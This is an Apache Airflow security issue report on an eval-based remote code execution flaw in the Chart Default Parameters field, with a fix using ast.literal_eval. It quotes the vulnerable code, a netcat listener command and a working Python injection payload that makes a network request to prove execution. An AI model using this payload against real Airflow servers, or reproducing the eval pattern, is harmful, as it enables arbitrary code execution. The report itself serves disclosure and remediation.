Apache Airflow / AIRFLOW-933

Security - Airflow Use of Eval Allows for Remote Code Execution


    Details

    • Type: Bug
    • Status: Resolved
    • Priority: Major
    • Resolution: Fixed
    • Affects Version/s: None
    • Fix Version/s: 1.8.0
    • Component/s: None
    • Labels: None

      Description

      Impact: Any user with the ability to create or edit Charts may execute arbitrary code on the Airflow server.
      Location: The Default Parameters form field sent when saving a Chart, located at /admin/chart/new/
      Description: The Chart functionality allows for the definition of Default Parameters, which are baseline constraints for the values within a chart.
      This data is user-controllable and is passed directly to a Python eval, which executes it as code:

      from flask import url_for
      from markupsafe import Markup


      def label_link(v, c, m, p):
          # m.default_params is the raw text of the Chart's Default Parameters
          # field. It comes straight from the user and reaches eval() here, so
          # any Python expression in the field runs with the web server's
          # privileges. The bare except only hides parse errors; code that
          # parses successfully is executed before the result is used.
          try:
              default_params = eval(m.default_params)
          except:
              default_params = {}
          url = url_for(
              'airflow.chart', chart_id=m.id, iteration_no=m.iteration_no,
              **default_params)
          return Markup("<a href='{url}'>{m.label}</a>".format(**locals()))
      

      Reproduction Steps:
      1. Configure a local instance of Airflow, and start a local netcat listener with the following shell command: nc -l 1337
      2. Access Airflow as a user able to create or edit Charts.
      3. Browse to /admin/chart/new to bring up the UI for creating a Chart.
      4. In its Default Parameters field, enter the following example payload:
      (lambda __g: [(urllib.request.urlopen('http://127.0.0.1:1337/').read (), None)[1] for __g['urllib'] in [(__import__('urllib.request', __g, __g))]][0])(globals())

      5. Save the Chart, and observe that the application has made a network request to your listener, indicating that your code has executed.
      Remediation: Use the Python method ast.literal_eval (https://docs.python.org/3/library/ast.html#ast.literal_eval), which only parses Python literals rather than executing its input as code, and check that the parsed result is a dict before passing it to url_for.
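      The following is an added example, not code from this issue or from the Airflow project, contrasting the eval() pattern above with the suggested ast.literal_eval fix. It keeps the report's payload only as a string for the safe parser to reject (it is never eval'd here); the MAX_DEFAULT_PARAMS_LEN cap, the SCALAR_TYPES whitelist, the function names and the harmless PROBE expression are assumptions for this demonstration.

```python
import ast
from typing import Any, Dict

# Assumed upper bound on the field: ast.literal_eval is documented to be able
# to crash the interpreter on sufficiently deeply nested input, so the text is
# bounded before it is parsed.
MAX_DEFAULT_PARAMS_LEN = 4096

# url_for() can only turn scalar keyword values into query-string arguments,
# so the parsed dict is restricted to these value types (assumed policy).
SCALAR_TYPES = (str, int, float, bool, type(None))

# The payload quoted in the report, kept here only as data for the safe parser.
REPORT_PAYLOAD = (
    "(lambda __g: [(urllib.request.urlopen('http://127.0.0.1:1337/').read (), "
    "None)[1] for __g['urllib'] in [(__import__('urllib.request', __g, __g))]][0])"
    "(globals())"
)

# Constructed, side-effect-free probe: eval() returns the server's PID, which
# shows code ran; ast.literal_eval refuses it because it contains a call.
PROBE = "__import__('os').getpid()"


def parse_default_params_unsafe(raw: str) -> Any:
    """Mirror of the vulnerable pattern: eval() on user-controlled text."""
    try:
        return eval(raw)
    except Exception:
        return {}


def parse_default_params_safe(raw: str) -> Dict[str, Any]:
    """Parse the Default Parameters field without executing it.

    ast.literal_eval accepts only literals (strings, numbers, tuples, lists,
    dicts, sets, booleans, None). Calls, lambdas, attribute access and name
    lookups raise ValueError before anything runs. The result is then checked
    to be a flat dict of str -> scalar, which is all url_for() can consume.
    """
    if len(raw) > MAX_DEFAULT_PARAMS_LEN:
        raise ValueError("default_params too long")
    try:
        value = ast.literal_eval(raw)
    except (ValueError, SyntaxError, MemoryError, RecursionError) as exc:
        raise ValueError(f"default_params is not a literal: {exc!r}") from exc
    if not isinstance(value, dict):
        raise ValueError("default_params must be a dict literal")
    for key, val in value.items():
        if not isinstance(key, str):
            raise ValueError(f"non-string key {key!r}")
        if not isinstance(val, SCALAR_TYPES):
            raise ValueError(f"non-scalar value for key {key!r}")
    return value


def default_params_or_empty(raw: str) -> Dict[str, Any]:
    """Drop-in for the original `except: default_params = {}` fallback,
    but reached only when the input is not an acceptable literal."""
    try:
        return parse_default_params_safe(raw)
    except ValueError:
        return {}


if __name__ == "__main__":
    print(parse_default_params_safe("{'chart_id': 7, 'label': 'cpu'}"))
    print(default_params_or_empty(REPORT_PAYLOAD))   # {}: rejected, nothing ran
    print(type(parse_default_params_unsafe(PROBE)))   # int: eval executed it
```

      Note that ast.literal_eval is a parser, not a sandbox: it still has to be combined with the length bound and the dict-shape check, because a literal that is not a dict (a list, a bare string) would otherwise fail later inside url_for, and an attacker could still choose arbitrary key names if they were not validated.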

            People

            • Assignee: amaliujia Rui Wang
            • Reporter: amaliujia Rui Wang
